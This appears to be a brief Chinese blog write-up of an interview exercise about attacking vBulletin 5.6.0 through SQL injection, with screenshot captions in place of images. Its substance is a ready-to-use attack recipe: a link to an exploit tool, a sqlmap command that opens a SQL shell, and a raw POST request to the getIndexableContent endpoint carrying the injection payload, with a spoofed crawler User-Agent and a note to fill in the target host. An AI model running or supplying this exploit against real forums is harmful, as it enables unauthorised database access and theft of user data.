vBulletin 5.6.0 SQL injection tool

记一次面试题目

[toc]

1
2
3
IP:NONE
CMS:vBulletin 5.6.0
Attack mode:SQL injection

截图:

首页截图

image-20200713170141449

CMS型号查找

image-20200713170206913

后期用于sqlshell写路劲

image-20200713170410945

漏洞相关

知道创宇 漏洞利用

image-20200713170853591

安全狮 漏洞浮现及原理

image-20200811114958863

漏洞工具

Python工具

https://gitee.com/zygds/vBulletin-5.6.0-SQL-injection-tool

Sqlmap:

1
sqlmap -r 1.txt --sql-shell # 命令可换其他

1.txt

1
2
3
4
5
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: # 此处填写ip:post,80,443,不需要填写,记得删除这些文字
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

nodeId[nodeid]=1--